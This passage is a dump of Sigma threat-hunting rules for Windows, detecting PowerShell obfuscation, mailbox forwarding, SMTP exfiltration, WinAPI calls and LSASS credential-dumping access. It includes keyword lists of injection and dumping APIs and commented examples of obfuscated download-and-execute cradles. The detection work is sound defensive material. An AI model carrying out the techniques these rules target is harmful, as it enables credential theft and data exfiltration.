'HostApplication=?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n            - 'HostApplication=?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=powershell'\n    filter_optional_citrix:\n        Data|contains: 'Citrix\\ConfigSync\\ConfigSync.ps1'\n    filter_optional_hexnode:\n        Data|contains: 'HostApplication=C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter\n    - MSP Detection Searcher\n    - Citrix ConfigSync.ps1\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_classic/posh_pc_bxor_operator_usage.yml",
    "content": "title: bXOR Operator Usage In PowerShell Command Line - PowerShell Classic\nid: 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6\nstatus: test\ndescription: |\n    Detects powershell execution with that make use of to the bxor (Bitwise XOR).\n    Attackers might use as an alternative obfuscation method to Base64 encoded commands.\n    Investigate the CommandLine and process tree to determine if the activity is malicious.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1\nauthor: Teymur Kheirkhabarov, Harish Segar\ndate: 2020-06-29\nmodified: 2024-12-11\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'HostName=ConsoleHost'\n            - ' -bxor '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml",
    "content": "title: Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet\nid: ea207a23-b441-4a17-9f76-ad5be47d51d3\nstatus: test\ndescription: Detects execution of \"Get-NetFirewallRule\" or \"Show-NetFirewallRule\" to enumerate the local firewall rules on a host.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps\nauthor: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io\ndate: 2023-07-13\ntags:\n    - detection.threat-hunting\n    - attack.discovery\n    - attack.t1518.001\n    - attack.t1016\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_payload:\n        Payload|contains:\n            - 'Get-NetFirewallRule'\n            - 'Show-NetFirewallRule'\n    selection_contextinfo:\n        ContextInfo|contains:\n            - 'Get-NetFirewallRule'\n            - 'Show-NetFirewallRule'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administration scripts\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_compress_archive_usage.yml",
    "content": "title: Compress-Archive Cmdlet Execution\nid: 6dc5d284-69ea-42cf-9311-fb1c3932a69a\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" cmdlet in order to compress folders and files.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-12-15\ntags:\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1560\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Compress-Archive'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_email_forwarding_activity.yml",
    "content": "title: Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet\nid: 0c7686d5-c74e-4292-b224-2a08e956ebc4\nrelated:\n    - id: c726e007-2cd0-4a55-abfb-79730fbedee5\n      type: similar\n    - id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474\n      type: obsolete\nstatus: experimental\ndescription: Detects email forwarding or redirecting activity via ExchangePowerShell Cmdlet\nreferences:\n    - https://redcanary.com/blog/email-forwarding-rules/\n    - https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-03-01\ntags:\n    - attack.collection\n    - attack.t1114.003\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.t1020\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n            - 'Set-Mailbox'\n    selection_params:\n        ScriptBlockText|contains:\n            - 'ForwardAsAttachmentTo'\n            - 'ForwardingAddress'\n            - 'ForwardingSmtpAddress'\n            - 'ForwardTo'\n            - 'RedirectTo' # Also covers \"RedirectToRecipients\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate mail forwarding rules created by users or administrators to forward email to designated internal or external recipients for business or operational purposes.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_inbox_rule_creation_or_update_activity.yml",
    "content": "title: Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet\nid: 04580eed-e1d6-426b-a570-f6e64a4577f7\nrelated:\n    - id: d3577be1-42c9-44a7-b56e-2e8de97349d3\n      type: similar\nstatus: experimental\ndescription: |\n    Detects inbox rule creation or update via ExchangePowerShell cmdlet, a technique commonly observed in Business Email Compromise (BEC) attacks to hide emails.\n    The usage of inbox rules can be a sign of a compromised mailbox, where an attacker is attempting to evade detections by suppressing or redirecting incoming emails.\n    Analysts should review these rules in context, validate whether they reflect normal user behavior, and correlate with other indicators such as unusual login activity or recent mailbox rule modifications.\nreferences:\n    - https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1114.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n    selection_params:\n        ScriptBlockText|contains:\n            - 'DeleteMessage'\n            - 'MarkAsRead'\n            - 'MoveToFolder'\n            - 'SubjectOrBodyContainsWords'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate inbox rules created by users or administrators to manage email flow such as filtering, organizing, or automating email handling.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_mailbox_access.yml",
    "content": "title: Windows Mail App Mailbox Access Via PowerShell Script\nid: 4e485d01-e18a-43f6-a46b-ef20496fa9d3\nstatus: test\ndescription: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md\nauthor: frack113\ndate: 2023-07-08\ntags:\n    - attack.defense-evasion\n    - attack.t1070.008\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains: '\\Comms\\Unistore\\data'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_new_netfirewallrule_allow.yml",
    "content": "title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock\nid: 8d31dd2e-b582-48ca-826e-dcaa2c1ca264\nrelated:\n    - id: 51483085-0cba-46a8-837e-4416496d6971\n      type: similar\nstatus: test\ndescription: |\n    Detects when a powershell script contains calls to the \"New-NetFirewallRule\" cmdlet in order to add a new firewall rule with an \"Allow\" action.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113\ndate: 2024-05-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'New-NetFirewallRule*-Action*Allow'\n    condition: selection\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml",
    "content": "title: SMB over QUIC Via PowerShell Script\nid: 6df07c3b-8456-4f8b-87bb-fe31ec964cae\nrelated:\n    - id: 2238d337-42fb-4971-9a68-63570f2aede4\n      type: similar\nstatus: test\ndescription: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md\n    - https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps\n    - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nauthor: frack113\ndate: 2023-07-21\ntags:\n    - attack.lateral-movement\n    - attack.t1570\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-SmbMapping'\n            - '-TransportType QUIC'\n    condition: selection\nfalsepositives:\n    - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_registry_reconnaissance.yml",
    "content": "title: Potential Registry Reconnaissance Via PowerShell Script\nid: 064060aa-09fb-4636-817f-020a32aa7e9e\nrelated:\n    - id: 970007b7-ce32-49d0-a4a4-fbef016950bd\n      type: similar\nstatus: test\ndescription: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md\nauthor: frack113\ndate: 2023-07-02\ntags:\n    - attack.discovery\n    - attack.t1012\n    - attack.t1007\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # TODO: switch to |re|i: after sigma specification v2 is released\n        ScriptBlockText|re: '(Get-Item|gci|Get-ChildItem).{1,64}-Path.{1,64}\\\\(currentcontrolset\\\\services|CurrentVersion\\\\Policies\\\\Explorer\\\\Run|CurrentVersion\\\\Run|CurrentVersion\\\\ShellServiceObjectDelayLoad|CurrentVersion\\\\Windows\\winlogon)\\\\'\n    condition: selection\nfalsepositives:\n    - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_remove_item_path.yml",
    "content": "title: Use Of Remove-Item to Delete File - ScriptBlock\nid: b8af5f36-1361-4ebe-9e76-e36128d947bf\nstatus: test\ndescription: PowerShell Remove-Item  with -Path to delete a file or a folder with \"-Recurse\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-15\nmodified: 2022-03-17\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Remove-Item -Path '\n            - 'del -Path '\n            - 'erase -Path '\n            - 'rd -Path '\n            - 'ri -Path '\n            - 'rm -Path '\n            - 'rmdir -Path '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml",
    "content": "title: Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet\nid: 9a7afa56-4762-43eb-807d-c3dc9ffe211b\nstatus: test\ndescription: |\n    Detects the execution of a PowerShell script with a call to the \"Send-MailMessage\" cmdlet along with the \"-Attachments\" flag. This could be a potential sign of data exfiltration via Email.\n    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4\n    - https://www.ietf.org/rfc/rfc2821.txt\nauthor: frack113\ndate: 2022-09-26\nmodified: 2024-11-01\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Send-MailMessage*-Attachments'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml",
    "content": "title: Powershell Token Obfuscation - Powershell\nid: f3a98ce4-6164-4dd4-867c-4d83de7eca51\nrelated:\n    - id: deb9b646-a508-44ee-b7c9-d8965921c6b6\n      type: similar\nstatus: test\ndescription: |\n    Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation in Powershell scripts.\n    Use this rule as a threat-hunting baseline to find obfuscated scripts in your environment.\n    Once tested and tuned, consider deploying a production detection rule based on this hunting rule.\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation\nauthor: frack113\ndate: 2022-12-27\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1027.009\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # Examples:\n        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString\n        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString\n        #   &(\"{2}{3}{0}{4}{1}\"-f 'e','Expression','I','nvok','-') (&(\"{0}{1}{2}\"-f'N','ew-O','bject') Net.WebClient).DownloadString\n        - ScriptBlockText|re: '\\w+`(\\w+|-|.)`[\\w+|\\s]'\n        # - ScriptBlockText|re: '\\((\\'(\\w|-|\\.)+\\'\\+)+\\'(\\w|-|\\.)+\\'\\)' TODO: fixme\n        - ScriptBlockText|re: '\"(\\{\\d\\}){2,}\"\\s*-f'  # trigger on at least two placeholders. One might be used for legitimate string formatting\n        #   ${e`Nv:pATh}\n        - ScriptBlockText|re: '(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}'\n    filter_envpath:\n        ScriptBlockText|contains: '${env:path}' # TODO: Fix this. See https://github.com/SigmaHQ/sigma/pull/4964\n    filter_chocolatey:\n        ScriptBlockText|contains:\n            - 'it will return true or false instead'  # Chocolatey install script https://github.com/chocolatey/chocolatey\n            - 'The function also prevents `Get-ItemProperty` from failing' # https://docs.chocolatey.org/en-us/create/functions/get-uninstallregistrykey\n    filter_exchange:\n        Path|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        Path|endswith: '\\bin\\servicecontrol.ps1'\n        ScriptBlockText|contains: '`r`n'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Edge case might be possible with heavy use of string formatting or obfuscation in legitimate scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_win_api_functions_access.yml",
    "content": "title: WinAPI Library Calls Via PowerShell Scripts\nid: 19d65a1c-8540-4140-8062-8eb00db0bba5\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: similar\n    - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4\n      type: similar\nstatus: test\ndescription: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Advapi32.dll'\n            - 'kernel32.dll'\n            - 'KernelBase.dll'\n            - 'ntdll.dll'\n            - 'secur32.dll'\n            - 'user32.dll'\n    condition: selection\nfalsepositives:\n    - Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)\n    - Chocolatey scripts\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/powershell/powershell_script/posh_ps_win_api_library_access.yml",
    "content": "title: WinAPI Function Calls Via PowerShell Scripts\nid: 9f22ccd5-a435-453b-af96-bf99cbb594d4\nrelated:\n    - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\n      type: similar\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: similar\n    - id: 19d65a1c-8540-4140-8062-8eb00db0bba5\n      type: similar\nstatus: test\ndescription: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1106\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'AddSecurityPackage'\n            - 'AdjustTokenPrivileges'\n            - 'CloseHandle'\n            - 'CreateProcessWithToken'\n            - 'CreateRemoteThread'\n            - 'CreateThread'\n            - 'CreateUserThread'\n            - 'DangerousGetHandle'\n            - 'DuplicateTokenEx'\n            - 'EnumerateSecurityPackages'\n            - 'FreeLibrary'\n            - 'GetDelegateForFunctionPointer'\n            - 'GetLogonSessionData'\n            - 'GetModuleHandle'\n            - 'GetProcAddress'\n            - 'GetProcessHandle'\n            - 'GetTokenInformation'\n            - 'ImpersonateLoggedOnUser'\n            - 'LoadLibrary'\n            - 'memcpy'\n            - 'MiniDumpWriteDump'\n            - 'OpenDesktop'\n            - 'OpenProcess'\n            - 'OpenProcessToken'\n            - 'OpenThreadToken'\n            - 'OpenWindowStation'\n            - 'QueueUserApc'\n            - 'ReadProcessMemory'\n            - 'RevertToSelf'\n            - 'RtlCreateUserThread'\n            - 'SetThreadToken'\n            - 'VirtualAlloc'\n            - 'VirtualFree'\n            - 'VirtualProtect'\n            - 'WaitForSingleObject'\n            - 'WriteInt32'\n            - 'WriteProcessMemory'\n            - 'ZeroFreeGlobalAllocUnicode'\n    condition: selection\nfalsepositives:\n    - This rule is mainly used for hunting and will generate quite a lot of false positives when applied in production. It's best combined with other fields such as the path of execution, the parent process, etc.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_powershell_access.yml",
    "content": "title: Potential Credential Dumping Attempt Via PowerShell\nid: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5\nrelated:\n    - id: 3f07b9d1-2082-4c56-9277-613a621983cc\n      type: obsolete\n    - id: fb656378-f909-47c1-8747-278bf09f4f4f\n      type: similar\nstatus: test\ndescription: Detects a PowerShell process requesting access to \"lsass.exe\", which can be indicative of potential credential dumping attempts\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-11-28\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetImage|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_susp_source_process.yml",
    "content": "title: LSASS Access From Program In Potentially Suspicious Folder\nid: fa34b441-961a-42fa-a100-ecc28c886725\nstatus: test\ndescription: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-27\nmodified: 2023-12-06\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n        SourceImage|contains:\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\PerfLogs\\'\n            - '\\AppData\\'\n            - '\\Temporary'\n    filter_optional_generic_appdata:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\'\n        SourceImage|endswith:\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\software_reporter_tool.exe'\n            - '\\DropboxUpdate.exe'\n            - '\\MBAMInstallerService.exe'\n            - '\\WebexMTA.exe'\n            - '\\Meetings\\WebexMTAV2.exe'\n            - '\\WebEx\\WebexHost.exe'\n            - '\\JetBrains\\Toolbox\\bin\\jetbrains-toolbox.exe'\n        GrantedAccess: '0x410'\n    filter_optional_dropbox_1:\n        SourceImage|contains: ':\\Windows\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_optional_dropbox_2:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess: '0x1410'\n    filter_optional_dropbox_3:\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\Dropbox\\'\n            - ':\\Program Files\\Dropbox\\'\n        SourceImage|endswith: '\\DropboxUpdate.exe'\n        GrantedAccess: '0x1410'\n    filter_optional_nextron:\n        SourceImage|contains:\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n            - ':\\Windows\\Temp\\asgard2-agent-sc\\'\n        SourceImage|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n        GrantedAccess:\n            - '0x1fffff'\n            - '0x1010'\n            - '0x101010'\n    filter_optional_ms_products:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\vs_bootstrapper_'\n        GrantedAccess: '0x1410'\n    filter_optional_chrome_update:\n        SourceImage|contains: ':\\Program Files (x86)\\Google\\Temp\\'\n        SourceImage|endswith: '.tmp\\GoogleUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_optional_keybase:\n        SourceImage|contains: ':\\Users\\'\n        SourceImage|endswith: \\AppData\\Local\\Keybase\\keybase.exe\n        GrantedAccess: '0x1fffff'\n    filter_optional_avira:\n        SourceImage|contains: '\\AppData\\Local\\Temp\\is-'\n        SourceImage|endswith: '.tmp\\avira_system_speedup.tmp'\n        GrantedAccess: '0x1410'\n    filter_optional_viberpc_updater:\n        SourceImage|contains: '\\AppData\\Roaming\\ViberPC\\'\n        SourceImage|endswith: '\\updater.exe'\n        TargetImage|endswith: '\\winlogon.exe'\n        GrantedAccess: '0x1fffff'\n    filter_optional_adobe_arm_helper:\n        SourceImage|contains:  # Example path: 'C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\Temp\\2092867405\\AdobeARMHelper.exe'\n            - ':\\Program Files\\Common Files\\Adobe\\ARM\\'\n            - ':\\Program Files (x86)\\Common Files\\Adobe\\ARM\\'\n        SourceImage|endswith: '\\AdobeARMHelper.exe'\n        GrantedAccess: '0x1410'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Updaters and installers are typical false positives. Apply custom filters depending on your environment\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_lsass_uncommon_access_flag.yml",
    "content": "title: Uncommon GrantedAccess Flags On LSASS\nid: 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\nrelated:\n    - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\n      type: obsolete\nstatus: test\ndescription: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410\nreferences:\n    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-13\nmodified: 2023-11-30\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|endswith: '10'\n    # Absolute paths to programs that cause false positives\n    filter1:\n        SourceImage:\n            - 'C:\\Program Files\\Common Files\\McAfee\\MMSSHost\\MMSSHOST.exe'\n            - 'C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n            - 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n            - 'C:\\PROGRAMDATA\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n            - 'C:\\Windows\\System32\\lsass.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\WINDOWS\\System32\\perfmon.exe'\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - 'C:\\WINDOWS\\system32\\taskmgr.exe'\n            - 'C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe'\n    # Windows Defender\n    